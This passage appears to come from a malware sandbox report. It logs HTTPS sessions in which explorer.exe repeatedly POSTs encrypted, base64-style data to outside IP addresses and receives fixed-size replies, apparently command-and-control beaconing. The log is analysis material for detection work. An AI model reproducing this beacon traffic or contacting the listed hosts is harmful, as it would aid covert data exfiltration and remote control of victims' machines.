                                              2024-07-23 04:17:11 UTC1122OUTData Raw: 58 62 44 6f 6e 4c 42 46 7a 51 37 4f 77 6f 64 51 48 38 70 65 58 4b 2b 4a 62 2f 6a 30 73 75 6a 30 63 57 43 45 4c 2f 39 2b 65 2b 35 4e 35 32 76 6d 7a 6e 6b 50 65 55 77 42 77 64 73 44 67 66 63 67 2b 39 70 32 50 4f 69 52 62 2b 6c 32 39 2b 59 73 42 70 65 66 56 74 45 51 4c 57 46 6b 43 71 39 69 34 78 48 44 47 5a 39 55 30 56 67 32 52 44 57 72 47 4d 47 54 63 35 6c 45 75 6d 48 6d 7a 6e 48 4e 30 55 2b 71 63 2b 71 70 6c 41 65 33 78 59 5a 73 73 52 42 44 53 72 79 50 42 38 4d 6d 54 48 33 6d 58 39 69 33 4f 6d 47 75 39 36 79 35 53 69 59 49 49 77 59 4d 59 53 57 77 67 61 51 56 68 53 57 41 72 51 47 53 76 46 6f 30 61 47 2f 31 4a 63 32 5a 6f 31 6a 55 4f 32 74 68 63 59 4a 69 48 66 68 30 6d 31 32 76 6b 4f 76 46 51 37 6d 46 41 74 6f 37 4a 34 2b 47 6c 36 4e 31 55 4e 46 68 35 65 45
                                              Data Ascii: XbDonLBFzQ7OwodQH8peXK+Jb/j0suj0cWCEL/9+e+5N52vmznkPeUwBwdsDgfcg+9p2POiRb+l29+YsBpefVtEQLWFkCq9i4xHDGZ9U0Vg2RDWrGMGTc5lEumHmznHN0U+qc+qplAe3xYZssRBDSryPB8MmTH3mX9i3OmGu96y5SiYIIwYMYSWwgaQVhSWArQGSvFo0aG/1Jc2Zo1jUO2thcYJiHfh0m12vkOvFQ7mFAto7J4+Gl6N1UNFh5eE
                                              2024-07-23 04:17:12 UTC137INHTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:17:12 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close
                                              2024-07-23 04:17:12 UTC685INData Raw: 4f 4a 6d 48 6e 69 2f 47 42 37 59 34 6c 71 2f 46 79 55 55 32 43 77 44 56 5a 4f 76 78 6e 45 63 6d 58 36 42 72 4e 31 35 4a 42 78 56 55 65 51 77 69 4b 4a 32 39 74 7a 6d 70 38 79 2b 2f 47 62 56 78 63 6a 78 7a 66 4d 63 45 6c 62 67 59 64 45 61 6b 39 49 77 4d 47 76 51 66 49 66 52 73 36 70 63 65 70 57 53 54 73 6b 4f 39 37 34 55 66 39 78 56 70 6d 78 52 69 6b 43 71 56 50 54 57 44 33 78 58 6e 2f 71 5a 51 4f 6f 79 68 36 43 67 4b 49 6e 5a 4b 4d 61 62 31 4d 72 74 6c 2b 50 63 33 2b 34 30 73 44 77 31 57 4a 46 6b 73 63 4a 39 4f 30 72 71 58 4f 4e 55 30 42 32 59 74 70 69 69 63 6a 58 5a 55 62 79 4b 64 51 73 4b 73 61 6d 64 53 57 36 37 44 45 63 6b 72 7a 6e 42 77 4d 68 71 58 31 30 61 65 35 44 30 48 6c 78 32 4b 33 31 6b 61 68 33 61 6b 69 51 65 6b 35 66 76 50 6f 71 41 39 35 34 34
                                              Data Ascii: OJmHni/GB7Y4lq/FyUU2CwDVZOvxnEcmX6BrN15JBxVUeQwiKJ29tzmp8y+/GbVxcjxzfMcElbgYdEak9IwMGvQfIfRs6pcepWSTskO974Uf9xVpmxRikCqVPTWD3xXn/qZQOoyh6CgKInZKMab1Mrtl+Pc3+40sDw1WJFkscJ9O0rqXONU0B2YtpiicjXZUbyKdQsKsamdSW67DEckrznBwMhqX10ae5D0Hlx2K31kah3akiQek5fvPoqA9544


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              11192.168.2.549743107.173.160.1374431028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-23 04:17:13 UTC234OUTPOST / HTTP/1.1
                                              Host: 107.173.160.137
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1122
                                              2024-07-23 04:17:13 UTC1122OUTData Raw: 53 64 67 48 38 56 30 50 63 46 35 38 35 69 58 33 30 55 79 39 6b 6e 6f 44 42 52 63 2b 4f 58 52 31 30 63 32 39 49 63 33 76 55 52 63 47 47 53 62 6f 2b 2f 53 33 78 70 6e 33 45 76 2b 6b 30 52 74 4e 47 4e 43 57 65 39 55 4e 52 63 46 4f 73 4c 51 72 46 58 31 64 64 46 58 36 4a 51 38 6e 75 79 43 66 70 4c 78 72 79 69 67 54 49 4d 77 6e 36 33 38 49 63 4d 45 41 5a 70 37 55 70 62 46 34 65 2b 62 5a 4b 39 64 44 6a 4a 56 6e 2b 61 66 63 6a 72 6c 58 62 54 62 42 4a 70 67 65 47 37 32 59 7a 6a 33 45 70 61 6d 61 2b 69 65 46 41 45 52 61 6d 74 45 49 71 70 31 43 55 31 63 38 59 56 4e 58 67 66 4d 6d 62 44 58 2b 52 72 61 71 61 46 6b 30 43 62 6e 65 71 72 43 4a 7a 51 56 71 34 76 55 6e 72 6f 76 6c 36 41 4c 6b 43 62 4e 49 52 77 50 4f 37 67 6c 6d 50 71 67 39 56 71 6d 32 47 38 59 51 2b 78 73
                                              Data Ascii: SdgH8V0PcF585iX30Uy9knoDBRc+OXR10c29Ic3vURcGGSbo+/S3xpn3Ev+k0RtNGNCWe9UNRcFOsLQrFX1ddFX6JQ8nuyCfpLxryigTIMwn638IcMEAZp7UpbF4e+bZK9dDjJVn+afcjrlXbTbBJpgeG72Yzj3Epama+ieFAERamtEIqp1CU1c8YVNXgfMmbDX+RraqaFk0CbneqrCJzQVq4vUnrovl6ALkCbNIRwPO7glmPqg9Vqm2G8YQ+xs
                                              2024-07-23 04:17:19 UTC137INHTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:17:19 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close
                                              2024-07-23 04:17:19 UTC685INData Raw: 66 69 4c 56 53 73 43 6f 47 35 73 49 79 61 64 4f 36 39 48 4a 30 50 66 4d 57 2b 56 6e 54 45 31 61 6c 4b 69 73 68 68 5a 68 51 59 5a 58 6e 6a 35 59 57 39 76 4b 6a 30 49 33 62 7a 41 72 45 6c 4c 6e 75 64 52 67 73 66 6c 35 35 4b 31 6f 79 57 47 7a 66 79 33 32 75 64 34 43 57 39 62 32 67 77 79 4b 52 37 6d 70 58 4a 6e 4b 74 45 71 47 69 70 50 74 58 47 4d 72 6f 39 44 74 2b 2f 37 41 75 30 62 45 52 50 46 32 74 6d 63 62 30 41 51 76 78 7a 65 6a 53 33 58 55 6d 31 6c 31 33 37 54 45 41 73 71 4a 44 65 67 45 57 6d 52 48 30 59 6b 54 54 58 55 41 49 39 67 56 73 6f 6e 55 48 77 79 48 50 4e 37 55 4e 44 49 51 35 4b 37 2f 30 43 6d 50 4a 46 4e 44 2b 44 73 4b 35 56 75 4c 65 76 66 33 32 6e 54 69 48 71 58 31 53 58 59 6a 37 73 65 4d 71 75 32 4a 76 4b 56 32 41 6c 65 41 6c 61 37 46 64 72 64
                                              Data Ascii: fiLVSsCoG5sIyadO69HJ0PfMW+VnTE1alKishhZhQYZXnj5YW9vKj0I3bzArElLnudRgsfl55K1oyWGzfy32ud4CW9b2gwyKR7mpXJnKtEqGipPtXGMro9Dt+/7Au0bERPF2tmcb0AQvxzejS3XUm1l137TEAsqJDegEWmRH0YkTTXUAI9gVsonUHwyHPN7UNDIQ5K7/0CmPJFND+DsK5VuLevf32nTiHqX1SXYj7seMqu2JvKV2AleAla7Fdrd


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.549744107.173.160.1394431028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-23 04:17:20 UTC234OUTPOST / HTTP/1.1
                                              Host: 107.173.160.139
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1122
                                              2024-07-23 04:17:20 UTC1122OUTData Raw: 56 78 38 48 77 6d 72 41 43 66 32 2b 32 43 6b 71 54 6a 37 6d 2b 4a 2b 64 7a 35 7a 6a 48 59 31 54 31 41 41 4e 7a 6e 62 48 42 6e 53 4c 53 44 75 59 4e 6a 31 74 61 2f 4a 45 47 6b 4e 2b 6f 78 32 62 50 4f 50 65 78 56 39 6f 6f 35 57 50 5a 4f 73 6a 6f 75 64 36 46 59 49 68 2b 50 58 33 44 43 68 56 64 43 6e 32 55 53 36 75 68 46 64 52 52 79 38 32 35 75 68 33 72 67 57 52 59 75 62 6a 33 72 4d 42 7a 58 6e 53 38 5a 77 4d 5a 73 77 5a 79 35 37 4a 4f 42 6e 51 36 6b 30 30 72 5a 47 2f 6f 54 6e 78 79 4c 42 66 69 70 79 45 5a 42 79 51 59 45 2b 53 74 44 55 74 43 6c 45 67 6f 38 71 55 68 71 39 44 50 65 2f 62 64 50 78 59 68 37 39 62 45 77 37 73 36 73 47 55 6d 2b 68 34 38 52 49 57 77 49 65 35 6f 69 54 34 67 7a 54 74 56 31 65 61 35 7a 55 36 71 75 4c 53 77 64 49 47 35 77 73 51 39 62 58
                                              Data Ascii: Vx8HwmrACf2+2CkqTj7m+J+dz5zjHY1T1AANznbHBnSLSDuYNj1ta/JEGkN+ox2bPOPexV9oo5WPZOsjoud6FYIh+PX3DChVdCn2US6uhFdRRy825uh3rgWRYubj3rMBzXnS8ZwMZswZy57JOBnQ6k00rZG/oTnxyLBfipyEZByQYE+StDUtClEgo8qUhq9DPe/bdPxYh79bEw7s6sGUm+h48RIWwIe5oiT4gzTtV1ea5zU6quLSwdIG5wsQ9bX
                                              2024-07-23 04:17:21 UTC137INHTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:17:21 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close
                                              2024-07-23 04:17:21 UTC685INData Raw: 6b 43 72 52 77 44 36 35 72 46 78 4f 57 42 39 36 53 4f 4f 61 6d 62 51 4a 6c 42 73 46 4b 6b 67 4b 38 78 4f 53 45 72 48 77 76 45 4e 73 7a 38 68 63 6e 31 58 6e 63 37 6a 75 4d 6e 4a 2f 51 6b 4a 33 78 4c 46 79 46 58 74 7a 62 48 4b 36 67 32 55 6d 76 55 58 47 67 64 6d 2f 46 4c 47 2f 58 69 7a 58 34 30 54 31 79 4b 33 4c 69 6a 72 72 5a 50 41 2b 61 4f 4b 46 4d 6e 74 32 52 4b 39 70 45 4a 35 30 4d 35 4b 2f 62 4e 6c 57 54 33 30 69 4e 62 2b 30 63 46 43 52 6f 72 37 55 71 61 35 5a 47 70 6c 73 4b 2b 46 33 37 75 44 35 6b 45 36 55 77 6a 7a 6c 50 63 79 7a 4a 61 54 49 49 63 58 69 62 2f 39 52 74 67 72 50 48 4f 76 69 61 30 57 32 75 57 72 53 49 37 32 56 4e 67 61 52 69 70 4d 41 63 54 5a 50 6f 2f 7a 2f 68 72 59 4d 66 64 41 2b 64 78 4a 6a 66 46 48 67 66 33 30 56 46 46 34 6d 70 59 4e
                                              Data Ascii: kCrRwD65rFxOWB96SOOambQJlBsFKkgK8xOSErHwvENsz8hcn1Xnc7juMnJ/QkJ3xLFyFXtzbHK6g2UmvUXGgdm/FLG/XizX40T1yK3LijrrZPA+aOKFMnt2RK9pEJ50M5K/bNlWT30iNb+0cFCRor7Uqa5ZGplsK+F37uD5kE6UwjzlPcyzJaTIIcXib/9RtgrPHOvia0W2uWrSI72VNgaRipMAcTZPo/z/hrYMfdA+dxJjfFHgf30VFF4mpYN


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.549745167.235.128.1534431028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-23 04:17:22 UTC234OUTPOST / HTTP/1.1
                                              Host: 167.235.128.153
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1122
                                              2024-07-23 04:17:22 UTC1122OUTData Raw: 55 58 62 4a 61 2b 31 79 37 79 39 74 4a 77 36 4d 42 66 56 65 32 59 6b 63 7a 69 34 77 5a 51 6e 66 63 34 35 6b 56 42 34 6a 54 78 4e 35 50 76 52 6a 61 59 48 39 72 35 33 79 56 79 6d 4c 48 44 2b 6b 4a 4c 30 6a 59 77 79 5a 79 57 32 39 33 51 70 72 77 31 73 55 4b 61 59 36 35 50 4f 78 78 53 50 43 43 61 42 52 66 6c 48 77 45 77 55 4a 76 31 4b 53 42 42 6b 4e 6c 73 66 6d 56 33 31 69 35 49 4c 68 4c 61 48 48 50 74 38 35 57 6b 66 37 76 73 4c 49 39 33 33 4e 4a 68 49 4e 4d 42 6c 4e 65 4d 59 69 50 32 77 77 73 33 6f 36 2b 33 2b 78 4b 51 55 43 6f 64 4c 58 39 47 2b 55 57 4c 71 61 4f 6f 71 71 55 44 6b 35 48 63 37 41 65 43 35 4f 44 38 36 2f 77 63 73 6a 70 47 6b 51 41 51 6d 49 4e 52 38 72 37 6a 35 4c 4f 6e 76 57 72 43 56 56 56 35 79 6d 62 4b 66 69 70 36 36 78 36 75 69 4c 57 72 34
                                              Data Ascii: UXbJa+1y7y9tJw6MBfVe2Ykczi4wZQnfc45kVB4jTxN5PvRjaYH9r53yVymLHD+kJL0jYwyZyW293Qprw1sUKaY65POxxSPCCaBRflHwEwUJv1KSBBkNlsfmV31i5ILhLaHHPt85Wkf7vsLI933NJhINMBlNeMYiP2wws3o6+3+xKQUCodLX9G+UWLqaOoqqUDk5Hc7AeC5OD86/wcsjpGkQAQmINR8r7j5LOnvWrCVVV5ymbKfip66x6uiLWr4
                                              2024-07-23 04:17:23 UTC137INHTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:17:23 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close
                                              2024-07-23 04:17:23 UTC685INData Raw: 56 30 79 7a 2f 73 46 36 35 6d 55 58 78 45 31 59 6b 79 33 69 65 65 5a 77 73 51 62 4e 69 76 30 46 72 6c 43 52 53 70 4c 6e 73 65 74 56 34 4e 46 2f 7a 47 6c 32 36 7a 61 39 45 44 4c 75 72 64 70 66 66 69 35 38 45 47 53 2b 49 50 46 4a 38 65 67 7a 4a 49 68 4f 44 4d 44 77 37 73 33 75 78 4a 64 73 63 41 67 52 4e 68 32 68 6d 68 44 4c 34 54 6c 38 73 32 65 6a 7a 2f 50 2b 43 61 62 64 45 4a 4d 52 4c 78 74 54 5a 71 69 70 47 57 6b 66 74 41 49 66 35 65 4f 45 31 47 74 53 62 66 41 37 6d 70 7a 54 72 49 74 47 79 6f 73 6c 79 70 43 7a 71 71 75 6e 68 75 6f 37 63 2f 52 64 4d 66 63 7a 47 72 74 34 35 2b 37 41 4e 4a 2f 70 32 78 65 64 6d 31 52 55 61 54 79 4c 78 4e 65 62 6f 49 62 61 74 35 51 41 58 72 7a 30 32 61 47 68 76 4c 6e 50 6c 53 30 64 76 70 32 48 37 37 4d 39 63 71 34 70 6d 39 77
                                              Data Ascii: V0yz/sF65mUXxE1Yky3ieeZwsQbNiv0FrlCRSpLnsetV4NF/zGl26za9EDLurdpffi58EGS+IPFJ8egzJIhODMDw7s3uxJdscAgRNh2hmhDL4Tl8s2ejz/P+CabdEJMRLxtTZqipGWkftAIf5eOE1GtSbfA7mpzTrItGyoslypCzqqunhuo7c/RdMfczGrt45+7ANJ/p2xedm1RUaTyLxNeboIbat5QAXrz02aGhvLnPlS0dvp2H77M9cq4pm9w


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.2.549746107.173.160.1374431028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-23 04:17:23 UTC234OUTPOST / HTTP/1.1
                                              Host: 107.173.160.137
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1267
                                              2024-07-23 04:17:23 UTC1267OUTData Raw: 71 46 39 41 6a 6c 2b 75 53 72 39 30 4e 6b 4a 41 55 45 32 73 41 49 6b 54 36 6c 47 67 65 64 66 5a 43 31 4a 63 6b 2f 56 39 54 37 6a 6b 66 46 72 4e 34 79 30 46 33 64 37 31 2f 69 58 49 79 37 54 4b 4a 76 6f 4f 38 61 5a 57 48 47 48 4c 69 53 55 53 46 6e 72 35 7a 37 32 30 32 75 30 65 70 4f 33 73 30 59 30 48 43 67 58 67 77 69 4f 54 34 4d 69 52 31 58 51 52 6e 2b 49 57 5a 41 68 6d 4e 6e 34 4f 6c 44 5a 75 43 2f 66 6b 76 39 42 6d 69 78 76 4e 58 42 4b 6f 73 5a 5a 35 73 39 4f 75 73 66 63 50 63 4b 58 69 66 75 67 52 45 57 4f 49 41 47 63 2b 4d 47 72 6e 45 68 34 77 6a 49 6a 75 46 77 47 2f 38 63 6e 76 50 74 63 56 42 4b 4e 35 4d 33 5a 4e 54 6e 77 70 45 6a 49 61 77 54 35 48 4b 56 51 39 49 6d 48 2f 42 34 41 41 51 6f 70 52 35 48 42 48 63 6a 4e 61 56 33 66 6d 4d 38 55 74 64 70 64
                                              Data Ascii: qF9Ajl+uSr90NkJAUE2sAIkT6lGgedfZC1Jck/V9T7jkfFrN4y0F3d71/iXIy7TKJvoO8aZWHGHLiSUSFnr5z7202u0epO3s0Y0HCgXgwiOT4MiR1XQRn+IWZAhmNn4OlDZuC/fkv9BmixvNXBKosZZ5s9OusfcPcKXifugREWOIAGc+MGrnEh4wjIjuFwG/8cnvPtcVBKN5M3ZNTnwpEjIawT5HKVQ9ImH/B4AAQopR5HBHcjNaV3fmM8Utdpd
                                              2024-07-23 04:17:25 UTC137INHTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:17:25 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close
                                              2024-07-23 04:17:25 UTC685INData Raw: 67 36 43 43 4f 46 45 48 4e 39 58 6a 68 32 44 58 63 67 56 61 4f 45 67 55 46 53 5a 57 4a 65 6d 76 4d 31 55 55 6f 51 32 31 62 36 31 53 58 4d 77 47 36 59 73 38 78 4c 58 61 4a 61 6a 33 50 4a 74 4d 33 4b 66 54 69 45 35 70 4d 62 6e 39 59 4f 4a 70 79 70 6d 72 35 69 45 76 77 78 30 53 59 71 64 73 77 78 65 54 61 73 6c 46 34 30 33 2b 33 44 56 42 67 52 70 53 78 4c 4d 73 45 69 31 49 58 74 55 4f 66 43 59 42 39 62 39 49 43 61 45 67 4a 4d 45 37 37 55 76 51 74 4d 58 58 5a 6f 77 39 7a 36 79 6a 49 2b 70 53 78 38 72 35 46 7a 4e 67 69 79 30 78 4d 33 56 75 74 4b 6a 36 6c 37 6a 70 6b 31 47 52 43 5a 48 51 33 7a 42 45 49 6d 70 39 79 6f 47 39 76 73 4f 36 52 76 7a 4c 67 69 71 39 4b 65 4a 75 51 70 78 55 69 43 53 58 75 37 79 38 75 70 63 6f 39 52 63 37 35 4a 63 54 56 4b 65 76 6a 79 75
                                              Data Ascii: g6CCOFEHN9Xjh2DXcgVaOEgUFSZWJemvM1UUoQ21b61SXMwG6Ys8xLXaJaj3PJtM3KfTiE5pMbn9YOJpypmr5iEvwx0SYqdswxeTaslF403+3DVBgRpSxLMsEi1IXtUOfCYB9b9ICaEgJME77UvQtMXXZow9z6yjI+pSx8r5FzNgiy0xM3VutKj6l7jpk1GRCZHQ3zBEImp9yoG9vsO6RvzLgiq9KeJuQpxUiCSXu7y8upco9Rc75JcTVKevjyu


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              15192.168.2.549747107.173.160.1394431028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-23 04:17:25 UTC234OUTPOST / HTTP/1.1
                                              Host: 107.173.160.139
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1267
                                              2024-07-23 04:17:25 UTC1267OUTData Raw: 66 70 4a 41 39 2f 44 6a 6d 41 6e 58 4d 33 52 44 71 4e 64 2f 48 73 73 76 4f 6d 4d 66 59 62 77 76 59 4f 4d 79 39 66 36 50 6f 49 32 70 30 2f 66 4b 2b 72 58 33 76 35 52 31 37 55 31 79 4c 46 56 4d 6d 71 76 6a 49 6b 6b 64 75 44 58 74 37 6c 2f 50 45 4b 37 2f 6b 34 7a 50 42 64 31 38 58 4f 52 2f 67 49 68 67 4e 42 55 72 2b 6e 4a 37 57 33 6f 32 6d 62 30 63 30 7a 67 53 2f 4e 6b 4b 6f 66 58 77 67 64 48 48 47 75 62 2b 65 39 38 59 70 6c 67 6d 31 44 71 38 32 6d 73 6d 6b 67 31 36 70 32 6d 41 31 4e 2f 61 56 65 78 35 7a 58 38 71 62 44 58 7a 72 41 51 61 6b 57 53 6c 47 53 45 76 4f 59 33 6d 47 4b 77 38 48 57 62 44 33 66 2f 6b 4d 7a 6a 74 6d 35 69 65 64 32 2f 59 6e 50 73 43 52 70 4d 6b 30 66 49 72 6c 4d 38 69 2b 78 75 70 62 5a 48 33 78 35 4b 4d 6e 2b 31 57 62 52 71 62 78 79 67
                                              Data Ascii: fpJA9/DjmAnXM3RDqNd/HssvOmMfYbwvYOMy9f6PoI2p0/fK+rX3v5R17U1yLFVMmqvjIkkduDXt7l/PEK7/k4zPBd18XOR/gIhgNBUr+nJ7W3o2mb0c0zgS/NkKofXwgdHHGub+e98Yplgm1Dq82msmkg16p2mA1N/aVex5zX8qbDXzrAQakWSlGSEvOY3mGKw8HWbD3f/kMzjtm5ied2/YnPsCRpMk0fIrlM8i+xupbZH3x5KMn+1WbRqbxyg
                                              2024-07-23 04:17:27 UTC137INHTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:17:27 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close
                                              2024-07-23 04:17:27 UTC685INData Raw: 61 54 4d 63 2f 34 58 42 50 62 70 2b 76 65 6f 37 7a 59 4e 6a 78 5a 57 46 4e 61 42 61 47 6b 4c 30 67 36 6e 30 46 59 67 63 65 6d 4a 51 31 4d 35 34 37 30 56 4d 73 49 75 69 56 6c 34 56 65 68 4e 54 49 36 45 42 59 4b 69 42 57 31 59 4f 47 32 5a 4e 48 51 4b 5a 66 6d 38 45 52 71 53 6e 68 73 5a 75 4c 38 50 79 52 50 63 56 61 2b 4d 41 6f 78 71 58 4c 46 42 37 43 64 51 76 6d 4f 6d 38 72 76 61 57 34 47 68 38 58 44 54 68 51 4e 34 63 6c 55 6d 75 35 74 55 50 35 6f 57 6f 43 59 76 30 73 78 31 74 53 6e 58 39 74 64 4a 63 6b 6e 53 32 35 47 48 45 7a 58 54 56 43 52 5a 72 48 51 79 47 31 59 68 39 57 36 2b 4d 70 31 52 57 70 78 49 59 61 2b 6a 77 6a 70 77 54 71 4d 31 43 5a 75 34 79 35 31 42 2f 77 39 50 47 4e 6f 32 4e 41 65 76 42 72 47 2f 68 42 6f 41 61 67 75 55 69 53 4d 6a 66 6b 71 49
                                              Data Ascii: aTMc/4XBPbp+veo7zYNjxZWFNaBaGkL0g6n0FYgcemJQ1M5470VMsIuiVl4VehNTI6EBYKiBW1YOG2ZNHQKZfm8ERqSnhsZuL8PyRPcVa+MAoxqXLFB7CdQvmOm8rvaW4Gh8XDThQN4clUmu5tUP5oWoCYv0sx1tSnX9tdJcknS25GHEzXTVCRZrHQyG1Yh9W6+Mp1RWpxIYa+jwjpwTqM1CZu4y51B/w9PGNo2NAevBrG/hBoAaguUiSMjfkqI


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              16192.168.2.549748167.235.128.1534431028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-23 04:18:45 UTC234OUTPOST / HTTP/1.1
                                              Host: 167.235.128.153
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1122
                                              2024-07-23 04:18:45 UTC1122OUTData Raw: 6b 41 6f 67 6c 38 79 69 78 69 4c 4e 30 74 49 6d 69 73 47 59 46 75 71 71 6b 34 7a 42 79 4b 31 7a 7a 79 7a 64 32 59 71 6d 6f 6c 53 31 36 74 38 6c 47 66 54 6a 68 74 6a 75 4a 67 6c 4e 44 4e 76 59 6f 2b 2b 51 57 47 58 50 72 70 5a 70 57 5a 77 6b 53 43 74 76 6a 6f 6e 36 77 71 47 58 53 73 31 4f 6c 45 4c 46 74 71 77 33 49 4f 36 67 4c 4c 50 53 74 6b 5a 2b 6f 35 37 51 58 32 52 4f 4f 36 56 74 47 2f 56 37 4a 70 63 34 50 79 4d 38 55 4c 39 6a 63 6b 34 71 41 58 79 31 2f 2b 36 35 61 62 36 45 67 38 4b 6d 75 70 6a 58 42 4a 76 5a 71 79 57 53 43 32 32 56 4a 72 68 4b 56 2b 4b 45 6b 74 2f 4f 51 35 64 37 4f 69 58 6b 2b 48 68 4e 41 53 35 42 47 2b 71 46 36 73 73 46 39 62 58 79 73 52 72 6f 6d 33 53 43 32 44 6d 36 79 4f 4e 5a 72 53 64 45 79 50 2f 65 35 39 32 34 4e 54 6e 34 2f 70 7a
                                              Data Ascii: kAogl8yixiLN0tImisGYFuqqk4zByK1zzyzd2YqmolS16t8lGfTjhtjuJglNDNvYo++QWGXPrpZpWZwkSCtvjon6wqGXSs1OlELFtqw3IO6gLLPStkZ+o57QX2ROO6VtG/V7Jpc4PyM8UL9jck4qAXy1/+65ab6Eg8KmupjXBJvZqyWSC22VJrhKV+KEkt/OQ5d7OiXk+HhNAS5BG+qF6ssF9bXysRrom3SC2Dm6yONZrSdEyP/e5924NTn4/pz
                                              2024-07-23 04:18:46 UTC137INHTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:18:46 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close
                                              2024-07-23 04:18:46 UTC685INData Raw: 51 57 31 46 74 70 42 58 2f 75 33 76 77 69 55 65 32 41 49 43 6f 42 35 4e 57 49 76 52 37 58 38 74 35 73 43 6a 5a 64 63 4b 47 48 77 53 75 70 72 32 46 32 45 6c 43 2b 6a 55 6c 6e 68 5a 62 33 6b 69 63 50 47 6f 41 37 48 69 53 32 4c 48 32 34 39 75 41 50 5a 4e 68 6b 77 42 50 6e 61 63 51 31 6f 78 67 36 59 44 53 66 32 43 31 46 44 44 38 45 42 63 75 4d 45 30 63 4e 51 33 37 6a 63 6e 77 39 48 46 49 54 66 55 79 51 2b 73 62 34 35 6e 4f 56 42 4a 71 63 48 32 63 31 58 53 4d 6e 68 45 59 36 33 78 67 6c 46 79 6c 45 33 6a 46 78 39 49 52 42 75 45 64 51 35 6c 43 56 74 48 65 71 47 51 59 75 79 70 53 50 38 58 6b 2f 79 4c 2b 43 41 32 4f 4e 34 62 54 4b 63 38 70 5a 66 4a 4d 45 48 53 7a 74 62 4b 43 39 41 63 4d 4e 7a 38 33 7a 49 47 30 79 59 78 71 70 78 48 41 67 34 4b 77 39 33 64 43 65 65
                                              Data Ascii: QW1FtpBX/u3vwiUe2AICoB5NWIvR7X8t5sCjZdcKGHwSupr2F2ElC+jUlnhZb3kicPGoA7HiS2LH249uAPZNhkwBPnacQ1oxg6YDSf2C1FDD8EBcuME0cNQ37jcnw9HFITfUyQ+sb45nOVBJqcH2c1XSMnhEY63xglFylE3jFx9IRBuEdQ5lCVtHeqGQYuypSP8Xk/yL+CA2ON4bTKc8pZfJMEHSztbKC9AcMNz83zIG0yYxqpxHAg4Kw93dCee


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              17192.168.2.549761107.173.160.1374431028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-23 04:18:47 UTC234OUTPOST / HTTP/1.1
                                              Host: 107.173.160.137
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1267
